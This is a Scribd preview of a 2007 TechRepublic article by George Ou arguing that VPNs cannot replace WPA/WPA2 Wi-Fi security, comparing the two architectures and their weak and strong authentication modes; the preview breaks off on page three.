Welcome to Scribd, the world's digital library. Read, publish, and share books and documents. See more
Download
Standard view
Full view
of .
Look up keyword
Like this
1Activity
0 of .
Results for:
No results containing your search query
P. 1
Why VPN Can't Replace Wi-Fi Security

Why VPN Can't Replace Wi-Fi Security

Ratings: (0)|Views: 10|Likes:
Published by api-3727150

More info:

Published by: api-3727150 on Oct 15, 2008
Copyright:Attribution Non-commercial

Availability:

Read on Scribd mobile: iPhone, iPad and Android.
download as PDF, TXT or read online from Scribd
See more
See less

05/09/2014

pdf

text

original

Version 1.0
May 14, 2007
Why VPN can't replace Wi-Fi security
By George Ou

Every time the subject of wireless LAN security comes up, people ask me about VPN as a solution for securing
Wi-Fi. (Wi-Fi is the common marketing name for 802.11 wireless LANs). I've always told people that VPN security
shouldn't be a substitute for good Wi-Fi security, and I even posted a comprehensive guide to enterprise wireless

LAN security, but a loyal group of VPN-only supporters has always argued for a VPN-only alternative. I'm going to
explain VPN and Wi-Fi security as best I can and why there is a right time and right place for each architecture.
The VPN-only camp

The VPN-only camp consists of companies that have a vested interest in selling VPN solutions and some
individuals who are more familiar with VPN than Wi-Fi security so therefore everything looks like a VPN-type
problem because that's within their comfort range. It's a classic case of when all you have is a hammer,
everything looks like a nail. They'll tell you to not worry about Wi-Fi security and just use VPN. The typical
argument from the VPN-only camp is that the IEEE 802.11 standards body can't be trusted to come up with a
good solution for Wi-Fi security. To bolster their claims that Wi-Fi can't be trusted, the VPN-only camp will cite the
example of the WEP debacle and/or they'll even point out how "WPA is cracked."

Was WPA really cracked?

Anyone who states that "WPA was cracked" doesn't really understand what WPA is or what cracked means. What
they're actually referring to is the fact that a certain simple mode of WPA (designed primarily for home use), which
uses PSK (pre-shared keys), can be cracked when a simple, easy-to-guess PSK is in use. But that's only an
example of a poor deployment of WPA-PSK. A simple 10-character alpha-numeric random PSK (or greater) will
make it impractical to crack with dictionary attacks. I can just as easily point out that the same mistakes can be
made in certain VPN deployments that also make use of pre-shared keys.

Is WEP a permanent indictment of IEEE 802.11?

There is no question that WEP is completely broken beyond redemption. 802.11 WEP encryption was designed
during the late 90s during a time of strict U.S. export restrictions, when good cryptography was considered
advanced munitions. I've had sources familiar with that process tell me that stronger encryption algorithms were
shunned for fear of Wi-Fi products being banned for export. Not surprisingly, it took less than two years for the
cryptographic researchers (Fluhrer-Mantin-Shamir) to demonstrate serious flaws with WEP. But something
designed in the late 90s for exportability should not be a permanent indictment of Wi-Fi security or the
competence of the IEEE 802.11 standards body. If that's the standard we're going to judge by, we can pretty
much shun everything on the Internet. Moving beyond the WEP debacle, the Wi-Fi industry couldn't wait for the
IEEE to fix the standard, so they adopted TKIP (a patched version of WEP) with the WPA industry standard.

Bad implementations should be shunned, not entire categories

There are other bad implementations of VPN and Wi-Fi that have poorly designed authentication mechanisms.
ASLEAP, for example, is a tool that will easily crack bothLEAP Wi-Fi 802.1x authentication and PPTPVP N
authentication in nearly identical fashion, yet both protocols are (unfortunately) very popular. The argument
should be made against poor cryptographic implementations, not against Wi-Fi security in general.

Wi-Fi and VPN security defined
Modern Wi-Fi security

WPA or WPA2 security came from an industry association called the Wi-Fi Alliance, and both incorporate solid
cryptographic principles and algorithms. WPA was based on the original draft of the802.11i standard, and WPA2
was based on the finalized version of 802.11i. Wi-Fi encryption happens on the "data link layer" (Layer 2 of the
OSI model) and happens transparently in hardware and firmware. Note that there are exceptions to the Layer 2
rule with the advent of switched Wi-Fi topology, where access points all tunnel to a centrally managed switch.

For encryption, the only difference between WPA and WPA2 is that WPA2 mandates both TKIP (a proper
implementation of RC4) and AES encryption (good enough for top secret government security), whereas WPA
Page 1
Copyright \u00a92007 CNET Networks, Inc. All rights reserved.
For more downloads and a free TechRepublic membership, please visithttp://techrepublic.com .com/2001-6240-0. html
Why VPN can't replace Wi-Fi security
mandated only TKIP encryption with optional AES support. Neither TKIP or AES is considered broken, though
AES is unquestionably superior.

WPA/WPA2 has two modes of authentication and access control: home PSK mode and enterprise 802.1x mode.
For home mode, the use of multiple rounds of hashing makes dictionary attacks painfully slow and the
implementation of a "salt" in the key rules out the use of pre-computed hash tables (unless attacking a common
SSID). The enterprise mode of WPA calls for 802.1x, which is a standard for port-based network access control
that is open to a wide range of EAP (Extensible Authentication Protocol) types. The stronger EAP types, like EAP-
TLS, PEAP, or EAP-TTLS, use PKI digital certificates for strong authentication. Weaker EAP types, such as Cisco

LEAP, transmit hashed passwords in the clear and are easy to crack with dictionary attacks. Other weak
implementations, like CiscoEAP-FAST, are typically deployed with anonymous digital certificates, which make
them almost as easy to attack as LEAP.
Modern VPN security

VPN (virtual private network) is a privacy technology where the encryption usually happens at the network layer
(Layer 3 of the OSI model) with technology such as IPSEC, PPTP, and L2TP. More recent VPN implementations
have moved to SSL tunneling for ease of firewall, NAT, and proxy traversal (bypass) where the encryption
happens at the presentation layer (Layer 6 of the OSI model). Note that most VPN solutions emulate a Layer 2
connection by encapsulating Layer 2 within Layer 3 IPSEC or Layer 6 SSL. Layer 2 emulation allows the VPN
client to have a virtual IP address on the remote LAN it's connecting to. Some SSL-tunneling VPN (not to be
confused with application layer SSL-VPN) vendors, like Cisco, use ActiveX and/or Java installers to make it
possible to rapidly deploy the VPN client from a Web-based install. Microsoft will soon begin to incorporate a new
SSL-tunneling technology, called SSTP, into Windows' built-in VPN client, which currently supports only PPTP
and L2TP.

Encryption and authentication used in VPN vary depending on the implementation. Implementations such as
PPTP VPN use RC4 (40-, 56-, and 128-bit), whereas IPSEC and L2TP can use a wide range of encryption
algorithms, like DES (56-bit), 3DES (168-bit), and AES (128-, 192-, and 256-bit). Authentication mechanisms in
VPN can be weak, like PPTP, which transmits hashed passwords in the clear, or they can be strong PKI-based
implementations, like L2TP, which uses server and client digital certificates. Some IPSEC solutions will have the
option of using a pre-shared key or PKI-based digital certificates. If this sounds a lot like Wi-Fi security above, it's
not your imagination -- the principles of cryptography are universal.

Where VPN and Wi-Fi security fit in

VPN and Wi-Fi security each has its role in network security. VPNs allow you to connect securely over any
network (including the Internet) whether you're using a dial-up modem or a Wi-Fi hotspot connection. This allows
VPN to work from virtually anywhere in the world that provides Internet access. Wi-Fi security, on the other hand,
offers you security only at the data link layer between your mobile device and the wireless access point, which
usually means it can only work locally in a LAN environment. But Wi-Fi security solutions provide significantly
more speed, less overhead, and less complexity. The purpose of Wi-Fi security is to give you equal or better
security than using a wired connection to the LAN with an equal level of functionality.

When you're using a VPN connection, the connection to the LAN over the Internet doesn't happen until the user logs in and fires up the VPN client software and manually starts a connection. With Wi-Fi security, it is possible to use machine authentication to securely connect the computer before the user even logs into the PC. That means maintenance tasks like Windows Update, enterprise management tools, group policy updates prior to or during login, and new user login can all be supported. When a user wakes and logs into a laptop, it automatically and instantly logs the user into the wireless LAN with no user interaction. Centralized management and distribution of

Wi-Fi client configuration make Wi-Fi security very appealing to the enterprise. There are also cases where VPN
simply can't do the job at all because many embedded devices, like Wi-Fi VoIP phones, Wi-Fi label printers, and
Wi-Fi barcode scanners, can't support VPN but they will support Wi-Fi WPA/WPA2 security.
Page 2
Copyright \u00a92007 CNET Networks, Inc. All rights reserved.
For more downloads and a free TechRepublic membership, please visithttp://techrepublic.com .com/2001-6240-0. html
Why VPN can't replace Wi-Fi security
Wi-Fi security coexisting with VPN security

In the network topology diagram
shown here, we have a hybrid
solution where both VPN and Wi-
Fi security are deployed in an
enterprise network. The VPN
gateway provides encrypted
connections to users coming from
the Internet, while the access
points (more than one
represented) provide wireless
LAN connectivity for local
devices. The Wi-Fi network here
is a closed network, where
access control and authentication
are performed BEFORE a Wi-Fi
association is granted and the
encryption is performed in
hardware for everything at Layer
2 and above. This topology
utilizes a centralized RADIUS
authentication model that is
shared by all the access
points and VPN gateways. The
access points and VPN gateway
are the network access devices
that forward RADIUS authentication requests to the RADIUS server, which in turn checks with the user directory
(LDAP, Active Directory, Novell, etc.) for verification. This offers true single sign-on for both Wi-Fi and VPN
security with no waste in hardware.

VPN-only network-layer security

In the network topology shown
here, VPN is the only solution
being used to cover both VPN
and Wi-Fi users. It works to a
limited extent such that laptops,
Windows Mobile, Windows CE,
and portable Linux devices can
connect to the internal LAN as if
they were connected with a VPN
via an Internet hotspot. But
embedded devices, like Wi-Fi
VoIP phones, Wi-Fi label
printers, and barcode scanners,
aren't so fortunate; they aren't
supported by this architecture.
The performance is bottlenecked
at the VPN gateway, which may
require an upgrade to a gigabit-
capable gateway. Local Wi-Fi
users are forced to go through a
two-phase connection, where
they first connect to the Wi-Fi
network and then fire up their
VPN software.

The AES encryption hardware in
the access points and wireless
Page 3
Copyright \u00a92007 CNET Networks, Inc. All rights reserved.
For more downloads and a free TechRepublic membership, please visithttp://techrepublic.com .com/2001-6240-0. html

You're Reading a Free Preview

Download
scribd
/*********** DO NOT ALTER ANYTHING BELOW THIS LINE ! ************/ var s_code=s.t();if(s_code)document.write(s_code)//-->